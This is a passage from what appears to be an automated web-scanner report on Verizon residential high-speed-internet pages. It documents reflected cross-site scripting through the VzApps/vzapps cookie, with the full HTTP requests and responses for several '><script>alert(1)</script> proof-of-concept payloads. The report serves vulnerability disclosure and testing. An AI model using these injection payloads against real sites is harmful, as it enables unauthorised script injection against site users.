VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 57967
Expires: Sat, 20 Nov 2010 03:14:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:23 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX6487d'><script>alert(1)</script>b45a269dda5; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Verizon High Speed Internet: Installation
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/products_
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX6487D'><SCRIPT>ALERT(1)</SCRIPT>B45A269DDA5 ' />
...[SNIP]...

2.913. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Installation/Installation.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f5315'><script>alert(1)</script>2c1f456c2c6 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXf5315'><script>alert(1)</script>2c1f456c2c6; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 58000
Expires: Sat, 20 Nov 2010 03:14:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:08 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXf5315'><script>alert(1)</script>2c1f456c2c6; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Verizon High Speed Internet: Installation
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/products_
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXF5315'><SCRIPT>ALERT(1)</SCRIPT>2C1F456C2C6 ' />
...[SNIP]...

2.914. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e0ce9'><script>alert(1)</script>6ae6011d9f2 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXe0ce9'><script>alert(1)</script>6ae6011d9f2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 58000
Expires: Sat, 20 Nov 2010 00:09:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXe0ce9'><script>alert(1)</script>6ae6011d9f2; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Verizon High Speed Internet: Installation
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/products_
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXE0CE9'><SCRIPT>ALERT(1)</SCRIPT>6AE6011D9F2 ' />
...[SNIP]...

2.915. http://www22.verizon.com/Residential/HighSpeedInternet/Overview/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Overview/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b2139'><script>alert(1)</script>7fec920e9cc was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Overview/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXb2139'><script>alert(1)</script>7fec920e9cc; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71925
Expires: Sat, 20 Nov 2010 03:23:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:23:02 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXb2139'><script>alert(1)</script>7fec920e9cc; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Residential High-Speed Internet/Broadband (DSL)
</title><meta name="keywords" content="internet service, isp, internet, email, dsl, cable,
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB2139'><SCRIPT>ALERT(1)</SCRIPT>7FEC920E9CC ' />
...[SNIP]...

2.916. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Plans/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 136fa'><script>alert(1)</script>a9a22c4e567 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Plans/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX136fa'><script>alert(1)</script>a9a22c4e567; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 94422
Expires: Sat, 20 Nov 2010 03:14:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:26 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX136fa'><script>alert(1)</script>a9a22c4e567; path=/
Set-Cookie: ContextInfo_Language=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: Plans
</title><meta name="keywords" content="verizon high speed internet plans, verizon high speed internet prices, v
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX136FA'><SCRIPT>ALERT(1)</SCRIPT>A9A22C4E567 ' />
...[SNIP]...

2.917. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/Plans.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Plans/Plans.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 134f1'><script>alert(1)</script>ef0109a6fac was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX134f1'><script>alert(1)</script>ef0109a6fac; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 94442
Expires: Sat, 20 Nov 2010 00:13:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:32 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX134f1'><script>alert(1)</script>ef0109a6fac; path=/
Set-Cookie: ContextInfo_Language=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: Plans
</title><meta name="keywords" content="verizon high speed internet plans, verizon high speed internet prices, v
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX134F1'><SCRIPT>ALERT(1)</SCRIPT>EF0109A6FAC ' />
...[SNIP]...

2.918. http://www22.verizon.com/Residential/HighSpeedInternet/Value/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Value/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2d1ec'><script>alert(1)</script>5088e34c333 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Value/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; 